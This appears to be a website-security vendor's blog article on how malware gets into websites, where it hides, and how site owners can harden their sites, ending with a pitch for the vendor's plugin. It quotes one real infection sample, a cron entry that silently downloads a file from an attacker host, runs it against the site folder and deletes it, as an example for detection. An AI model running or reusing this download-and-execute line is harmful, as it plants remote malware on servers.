How Malware Enters Your Website
Almost since the inception of the Internet, malware infections have continued to be the biggest nuisance faced by a site owner. With an ever-increasing number of sites making up the World Wide Web, malware infections are becoming more and more common. In this article, we’ll discuss what malware is, the different types we’ve come across, the methods used to inject malware into a site, and how you can harden/protect your site against these methods.
What is malware?
So what exactly is malware? Well, malware is short for “malicious software” and is a file or code transmitted over a network. Malware is capable of adopting virtually any behavior desired by the attacker, depending on the vulnerability exploited by the attack. Generally, its intention is to abuse the resources of the site without damaging the site. If a site is broken/disabled, the attacker will not necessarily be able to achieve their goals. It is capable of inflicting damage such as redirecting users to spammy sites, using website resources to host phishing, filling website with links to spammy and unreplicable websites, the theft of customers’ credit card numbers or the degradation of a site. All of this can have a hugely negative effect on your website’s reputation and SEO. There are different types of malware, such as the following:
- credit card skimmer
- Drive by download
- back door
How Malware Spreads
The age-old question that website owners usually ask is “how did this infection happen?” However, to answer this question, you must first identify the attack. Malware can be found in some of the most obscure places, but here are the most common culprits we found:
- Content Management System (CMS) Core Integrity Files
- Site root directory
- Theme files
- Plugin/extension files
- index file
Malware injection can occur primarily through software vulnerabilities, third-party integrations, and obtaining login credentials through various tactics. How the infection is able to exploit your website and the level of access it will have to your environment will depend on the type of vulnerability it exploits and other mitigation/protection mechanisms in place, so this will vary from infection to infection. infection. It is important to note that re-infections can occur if no post-hack adjustments are made to the site. Malware can still potentially be injected without administrator rights (e.g. backdoors), and it can be installed without the victim’s knowledge if compromised. To reduce the risk of your site being re-infected with malware, skip to our section on post-hack prevention.
What Malware Looks Like
As mentioned earlier, malware can appear in many ways. Our server side parser is regularly updated to include new signatures discovered when new malware is written by attacks to exploit new vulnerabilities, sometimes 0-day (also called zero day exploits). For example, here is a recent malware infection in a jQuery file we encountered:
Another type of malware we found in the wp-content folder for WordPress was a backdoor script which appeared as such:
As you can see, the code in these files will usually be encoded in multiple layers of obfuscation, and are often associated with disruptions. .htaccess files that deny PHP running in the website environment:
Order Allow,Deny Allow from all
We can even detect malware in cron jobs on a hosting server. For example:
MAILTO="" * * * * * wget -q -O xxxd hxxp://hello.hahaha666[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/websitefolder/public_html 811-5 && rm -f xxxd
These are just a few of the many types of malware we’ve encountered during cleanups recently, but are worth noting in case you’re looking to identify malware on your own server.
While identifying and removing unwanted malware is important, one of the most crucial steps in fixing a site is tracking. Many site owners assume that if they just restore from a previous backup before an infection, everything will be fine again. However, this still doesn’t fix the underlying vulnerabilities that allowed the hack to happen in the first place. The same philosophy can be applied to insect infestation or personal health. You may have gotten rid of the bugs or disease, but understanding the main reason these things happened in the first place can help prevent them from happening again and may cost less in the future.
One of the most important recommendations I give to clients is to update their CMS version (WordPress, Drupal, Joomla, Magento, etc.), as well as theme and plugins.
Another recommendation is to make sure you keep plugins and user privileges to a minimum. Having too many plugins on a CMS can potentially make the site more vulnerable to infection, and having too many users with administrator privileges can be riskier.
Because database breaches have become more common, you always want to make sure all accounts have a strong password. Using a password generator as well as a password manager is one of the most effective ways to ensure that your site is not Brute Forced. For more information on securing your site, we recommend reading our guide.
Malware infections for the average business can be frightening and frustrating to experience, which is why our goal as a company is to educate and inform site owners on what to expect and how to overcome infections. As attacks continue to grow and become smarter, we must continue to be proactive and adapt to them. Since the average online user may not fully understand what is going on in the back-end, it is important for website owners to protect their customers’ sensitive information.
As the New Year approaches, make it a personal goal to monitor not only your personal safety as an online individual, but also as an online business. In addition to the previous recommendations and tips for securing your site, we provide a WordPress plugin who actively monitors your site, as well as our Website Security Plan including firewall protection. Get the peace of mind you need with your website security for the New Year.